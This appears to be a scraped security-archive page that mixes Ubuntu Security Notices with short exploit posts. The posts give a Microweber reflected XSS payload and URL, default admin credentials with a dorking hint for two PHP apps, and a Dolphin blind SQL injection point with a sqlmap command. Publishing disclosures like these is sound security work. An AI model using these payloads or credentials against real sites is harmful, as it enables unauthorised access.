Ubuntu Security Notice 6945-1 - Rory McNamara discovered that wpa_supplicant could be made to load arbitrary shared objects by unprivileged users that have access to the control interface. An attacker could use this to escalate privileges to root.

==========================================================================  
Ubuntu Security Notice USN-6945-1  
August 06, 2024

wpa vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

wpa_supplicant could be made to run programs as an administrator with  
specially crafted configuration file.

Software Description:  
- wpa: client support for WPA and WPA2

Details:

Rory McNamara discovered that wpa_supplicant could be made to load  
arbitrary shared objects by unprivileged users that have access to  
the control interface. An attacker could use this to escalate privileges  
to root.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   wpasupplicant                   2:2.10-21ubuntu0.1

Ubuntu 22.04 LTS  
   wpasupplicant                   2:2.10-6ubuntu2.1

Ubuntu 20.04 LTS  
   wpasupplicant                   2:2.9-1ubuntu4.4

Ubuntu 18.04 LTS  
   wpasupplicant                   2:2.6-15ubuntu2.8+esm1

Ubuntu 16.04 LTS  
   wpasupplicant                   2.4-0ubuntu6.8+esm1

Ubuntu 14.04 LTS  
   wpasupplicant                   2.1-0ubuntu1.7+esm5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6945-1  
   CVE-2024-5290,https://launchpad.net/bugs/2067613

Package Information:  
   https://launchpad.net/ubuntu/+source/wpa/2:2.10-21ubuntu0.1  
   https://launchpad.net/ubuntu/+source/wpa/2:2.10-6ubuntu2.1  
   https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu4.4  
   https://launchpad.net/ubuntu/+source/wpa/2:2.6-15ubuntu2.8+esm1  
   https://launchpad.net/ubuntu/+source/wpa/2.4-0ubuntu6.8+esm1  
   https://launchpad.net/ubuntu/+source/wpa/2.1-0ubuntu1.7+esm5

Ubuntu Security Notice USN-6945-1

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

Posted Aug 7, 2024

Authored by indoushka

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 8c38f4e680e6513d62d4303a51a4d7e3eaa5a7bb80e3e87ce8e510bba268a0b9

Download | Favorite | View

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,289)
*   Arbitrary (16,852)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,792)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,386)
*   DoS (25,050)
*   Encryption (2,389)
*   Exploit (53,137)
*   File Inclusion (4,259)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,889)
*   Intrusion Detection (915)
*   Java (3,143)
*   JavaScript (896)
*   Kernel (7,191)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,167)
*   Perl (1,435)
*   PHP (5,222)
*   Proof of Concept (2,382)
*   Protocol (3,724)
*   Python (1,635)
*   Remote (31,646)
*   Root (3,635)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,605)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,941)
*   Web (9,960)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,090)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,547)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,646)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,459)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,729)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,670)
*   Other

Covid-19 Directory On Vaccination System 1.0 Insecure Settings

Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.

    # Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)# Date: 16.07.2024# Exploit Author: Prerak Mittal# Vendor Homepage: https://microweber.org/# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15# Version: <=v2.0.15# Tested on: Ubuntu 22.04# CVE : CVE-2024-40101# Description:## App Installation:1. Clone the repository and build the application using docker:```git clone -b v2.0.15 https://github.com/microweber/microweber.gitcd microweberdocker compose up -d```2. Visit http://localhost3. Follow along the UI installation process.## Steps to reproduce:1. Visit http://localhost/search2. Insert the below payload in `keywords` parameter:  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.

Microweber 2.0.15 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

**Computer Laboratory Management System 1.0 Insecure Settings**

Posted Aug 6, 2024

Authored by indoushka

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 903fb54e0bd8fb8efe43fdddb49a0f5abaa23ea96b8495e4f7c47b36636f9f0d

Download | Favorite | View

**Computer Laboratory Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,255)
*   Arbitrary (16,849)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,786)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,385)
*   DoS (25,039)
*   Encryption (2,389)
*   Exploit (53,128)
*   File Inclusion (4,258)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,888)
*   Intrusion Detection (915)
*   Java (3,142)
*   JavaScript (896)
*   Kernel (7,188)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,166)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,632)
*   Remote (31,643)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,604)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,932)
*   Web (9,955)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,087)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,536)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,612)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,441)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,727)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Computer Laboratory Management System 1.0 Insecure Settings

Ubuntu Security Notice 6200-2 - USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the problem.

==========================================================================  
Ubuntu Security Notice USN-6200-2  
July 25, 2024

imagemagick vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in ImageMagick.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were  
incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the  
problem.

Original advisory details:

 It was discovered that ImageMagick incorrectly handled the "-authenticate"  
 option for password-protected PDF files. An attacker could possibly use  
 this issue to inject additional shell commands and perform arbitrary code  
 execution. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-29599)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing PDF files. If a user or automated system using ImageMagick  
 were tricked into opening a specially crafted PDF file, an attacker could  
 exploit this to cause a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20224)

  Zhang Xiaohui discovered that ImageMagick incorrectly handled certain  
 values when processing image data. If a user or automated system using  
 ImageMagick were tricked into opening a specially crafted image, an  
 attacker could exploit this to cause a denial of service. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20241, CVE-2021-20243)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing visual effects based image files. By tricking a user into  
 opening a specially crafted image file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20244, CVE-2021-20309)

  It was discovered that ImageMagick incorrectly handled certain values  
 when performing resampling operations. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20246)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing thumbnail image data. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20312)

  It was discovered that ImageMagick incorrectly handled memory cleanup  
 when performing certain cryptographic operations. Under certain conditions  
 sensitive cryptographic information could be disclosed. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20313)

  It was discovered that ImageMagick did not use the correct rights when  
 specifically excluded by a module policy. An attacker could use this issue  
 to read and write certain restricted files. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-39212)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2022-28463, CVE-2022-32545, CVE-2022-32546, CVE-2022-32547)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2021-3610, CVE-2023-1906,  
 CVE-2023-3428)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing specially crafted SVG files. By tricking a user into  
 opening a specially crafted SVG file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-1289)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 tiff file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-3195)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. (CVE-2023-34151)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6-common            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16hdri           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-common              8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-perl            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16-perl        8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16hdri-perl    8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6-headers           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-8             8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-dev           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-8         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-dev       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-dev                 8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  perlmagick                      8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5

Ubuntu 20.04 LTS  
  imagemagick                     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6-common            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16hdri           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-common              8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-perl            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16-perl        8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16hdri-perl    8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6-headers           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-8             8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-dev           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-8         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-dev       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-dev                 8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  perlmagick                      8:6.9.10.23+dfsg-2.1ubuntu11.10

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6200-2  
  https://ubuntu.com/security/notices/USN-6200-1  
  CVE-2023-1289, CVE-2023-34151

Package Information:  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.10.23+dfsg-2.1ubuntu11.10

Ubuntu Security Notice USN-6200-2

Ubuntu Security Notice 6944-1 - Dov Murik discovered that curl incorrectly handled parsing ASN.1 Generalized Time fields. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly obtain sensitive memory contents.

    ==========================================================================Ubuntu Security Notice USN-6944-1August 05, 2024curl vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:curl could be made to crash or expose information if it received speciallycrafted network traffic.Software Description:- curl: HTTP, HTTPS, and FTP client and client librariesDetails:Dov Murik discovered that curl incorrectly handled parsing ASN.1Generalized Time fields. A remote attacker could use this issue to causecurl to crash, resulting in a denial of service, or possibly obtainsensitive memory contents.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   curl                            8.5.0-2ubuntu10.2   libcurl3t64-gnutls              8.5.0-2ubuntu10.2   libcurl4t64                     8.5.0-2ubuntu10.2Ubuntu 22.04 LTS   curl                            7.81.0-1ubuntu1.17   libcurl3-gnutls                 7.81.0-1ubuntu1.17   libcurl3-nss                    7.81.0-1ubuntu1.17   libcurl4                        7.81.0-1ubuntu1.17Ubuntu 20.04 LTS   curl                            7.68.0-1ubuntu2.23   libcurl3-gnutls                 7.68.0-1ubuntu2.23   libcurl3-nss                    7.68.0-1ubuntu2.23   libcurl4                        7.68.0-1ubuntu2.23In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6944-1   CVE-2024-7264Package Information:   https://launchpad.net/ubuntu/+source/curl/8.5.0-2ubuntu10.2   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.17   https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.23

Ubuntu Security Notice USN-6944-1

Dolphin version 7.4.2 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Blind SQL Injection - dolphinv7.4.2.# Date: 8/2024# Exploit Author: Andrey Stoykov# Version: 7.4.2# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/07/friday-fun-pentest-series-8-dolphinv742.htmlSQL Injection:Steps to Reproduce:1. Navigate to "Builders" menu2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar3. That is the injection pointsqlmap -r request.txt --dbms=mysql -p cat[...][INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.45, Apacheback-end DBMS: MySQL >= 5.0.12[...]

Dolphin 7.4.2 Blind SQL Injection

Ubuntu Security Notice 6895-4 - It was discovered that the ATA over Ethernet driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the HugeTLB file system component of the Linux Kernel contained a NULL pointer dereference vulnerability. A privileged attacker could possibly use this to to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6895-4August 05, 2024linux-oem-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oem-6.5: Linux kernel for OEM systemsDetails:It was discovered that the ATA over Ethernet (AoE) driver in the Linuxkernel contained a race condition, leading to a use-after-freevulnerability. An attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6270)It was discovered that the HugeTLB file system component of the LinuxKernel contained a NULL pointer dereference vulnerability. A privilegedattacker could possibly use this to to cause a denial of service.(CVE-2024-0841)It was discovered that the Open vSwitch implementation in the Linux kernelcould overflow its stack during recursive action operations under certainconditions. A local attacker could use this to cause a denial of service(system crash). (CVE-2024-1151)Gui-Dong Han discovered that the software RAID driver in the Linux kernelcontained a race condition, leading to an integer overflow vulnerability. Aprivileged attacker could possibly use this to cause a denial of service(system crash). (CVE-2024-23307)Bai Jiaju discovered that the Xceive XC4000 silicon tuner device driver inthe Linux kernel contained a race condition, leading to an integer overflowvulnerability. An attacker could possibly use this to cause a denial ofservice (system crash). (CVE-2024-24861)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - PowerPC architecture;  - x86 architecture;  - Cryptographic API;  - Android drivers;  - Block layer subsystem;  - Bluetooth drivers;  - DMA engine subsystem;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - I2C subsystem;  - IIO ADC drivers;  - IIO subsystem;  - IIO Magnetometer sensors drivers;  - InfiniBand drivers;  - On-Chip Interconnect management framework;  - Multiple devices driver;  - Media drivers;  - Network drivers;  - PHY drivers;  - MediaTek PM domains;  - SCSI drivers;  - TTY drivers;  - USB subsystem;  - DesignWare USB3 driver;  - Framebuffer layer;  - AFS file system;  - BTRFS file system;  - Ceph distributed file system;  - Ext4 file system;  - File systems infrastructure;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Core kernel;  - Memory management;  - Bluetooth subsystem;  - CAN network layer;  - Devlink API;  - Handshake API;  - HSR network protocol;  - IPv4 networking;  - IPv6 networking;  - MAC80211 subsystem;  - Multipath TCP;  - Netfilter;  - NFC subsystem;  - RxRPC session sockets;  - TIPC protocol;  - Unix domain sockets;  - Realtek audio codecs;(CVE-2023-52638, CVE-2024-26684, CVE-2024-26659, CVE-2024-26708,CVE-2024-26663, CVE-2024-26662, CVE-2024-26789, CVE-2024-26831,CVE-2024-26703, CVE-2023-52643, CVE-2024-26688, CVE-2024-26733,CVE-2024-26818, CVE-2024-26707, CVE-2024-26820, CVE-2024-26719,CVE-2024-26726, CVE-2024-26830, CVE-2024-26694, CVE-2024-26715,CVE-2024-26829, CVE-2024-26697, CVE-2024-26916, CVE-2024-26735,CVE-2024-26717, CVE-2024-26748, CVE-2024-26696, CVE-2024-26710,CVE-2024-26642, CVE-2024-26680, CVE-2024-26675, CVE-2024-26723,CVE-2024-26718, CVE-2024-26666, CVE-2024-26720, CVE-2024-26838,CVE-2024-26824, CVE-2024-26676, CVE-2024-26665, CVE-2024-26693,CVE-2024-26698, CVE-2024-26890, CVE-2024-26601, CVE-2024-26826,CVE-2024-26711, CVE-2024-26602, CVE-2023-52645, CVE-2024-26716,CVE-2024-26660, CVE-2023-52642, CVE-2024-26898, CVE-2024-26803,CVE-2024-26923, CVE-2024-26722, CVE-2024-26677, CVE-2024-26825,CVE-2024-26606, CVE-2024-26790, CVE-2024-26828, CVE-2024-26910,CVE-2024-26681, CVE-2024-26689, CVE-2024-26667, CVE-2024-26798,CVE-2024-26679, CVE-2023-52631, CVE-2024-26926, CVE-2024-26661,CVE-2024-26700, CVE-2023-52637, CVE-2024-26919, CVE-2024-26917,CVE-2024-26712, CVE-2024-26889, CVE-2024-26674, CVE-2024-26792,CVE-2024-35833, CVE-2024-26822, CVE-2024-26734, CVE-2024-26691,CVE-2024-26685, CVE-2024-26782, CVE-2024-26702, CVE-2024-26600,CVE-2024-26922, CVE-2024-26593, CVE-2024-26736, CVE-2024-26920,CVE-2024-26603, CVE-2024-26714, CVE-2024-27416, CVE-2024-26695,CVE-2023-52880, CVE-2024-26664, CVE-2024-26802)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-6.5.0-1027-oem      6.5.0-1027.28  linux-image-oem-22.04           6.5.0.1027.29  linux-image-oem-22.04a          6.5.0.1027.29  linux-image-oem-22.04b          6.5.0.1027.29  linux-image-oem-22.04c          6.5.0.1027.29  linux-image-oem-22.04d          6.5.0.1027.29After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6895-4  https://ubuntu.com/security/notices/USN-6895-1  CVE-2023-52631, CVE-2023-52637, CVE-2023-52638, CVE-2023-52642,  CVE-2023-52643, CVE-2023-52645, CVE-2023-52880, CVE-2023-6270,  CVE-2024-0841, CVE-2024-1151, CVE-2024-23307, CVE-2024-24861,  CVE-2024-26593, CVE-2024-26600, CVE-2024-26601, CVE-2024-26602,  CVE-2024-26603, CVE-2024-26606, CVE-2024-26642, CVE-2024-26659,  CVE-2024-26660, CVE-2024-26661, CVE-2024-26662, CVE-2024-26663,  CVE-2024-26664, CVE-2024-26665, CVE-2024-26666, CVE-2024-26667,  CVE-2024-26674, CVE-2024-26675, CVE-2024-26676, CVE-2024-26677,  CVE-2024-26679, CVE-2024-26680, CVE-2024-26681, CVE-2024-26684,  CVE-2024-26685, CVE-2024-26688, CVE-2024-26689, CVE-2024-26691,  CVE-2024-26693, CVE-2024-26694, CVE-2024-26695, CVE-2024-26696,  CVE-2024-26697, CVE-2024-26698, CVE-2024-26700, CVE-2024-26702,  CVE-2024-26703, CVE-2024-26707, CVE-2024-26708, CVE-2024-26710,  CVE-2024-26711, CVE-2024-26712, CVE-2024-26714, CVE-2024-26715,  CVE-2024-26716, CVE-2024-26717, CVE-2024-26718, CVE-2024-26719,  CVE-2024-26720, CVE-2024-26722, CVE-2024-26723, CVE-2024-26726,  CVE-2024-26733, CVE-2024-26734, CVE-2024-26735, CVE-2024-26736,  CVE-2024-26748, CVE-2024-26782, CVE-2024-26789, CVE-2024-26790,  CVE-2024-26792, CVE-2024-26798, CVE-2024-26802, CVE-2024-26803,  CVE-2024-26818, CVE-2024-26820, CVE-2024-26822, CVE-2024-26824,  CVE-2024-26825, CVE-2024-26826, CVE-2024-26828, CVE-2024-26829,  CVE-2024-26830, CVE-2024-26831, CVE-2024-26838, CVE-2024-26889,  CVE-2024-26890, CVE-2024-26898, CVE-2024-26910, CVE-2024-26916,  CVE-2024-26917, CVE-2024-26919, CVE-2024-26920, CVE-2024-26922,  CVE-2024-26923, CVE-2024-26926, CVE-2024-27416, CVE-2024-35833Package Information:  https://launchpad.net/ubuntu/+source/linux-oem-6.5/6.5.0-1027.28

Ubuntu Security Notice USN-6895-4

Ubuntu Security Notice 6942-1 - It was discovered that Gross incorrectly handled memory when composing log entries. An attacker could possibly use this issue to cause Gross to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6942-1  
August 01, 2024

gross vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Gross could be made to crash or to allow arbitrary code execution.

Software Description:  
- gross: fast and efficient greylist server with DNSBL support

Details:

It was discovered that Gross incorrectly handled memory when composing log  
entries. An attacker could possibly use this issue to cause Gross to crash,  
resulting in a denial of service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   gross                           1.0.2-4ubuntu0.24.04.1

Ubuntu 22.04 LTS  
   gross                           1.0.2-4ubuntu0.22.04.1

Ubuntu 20.04 LTS  
   gross                           1.0.2-4ubuntu0.20.04.1

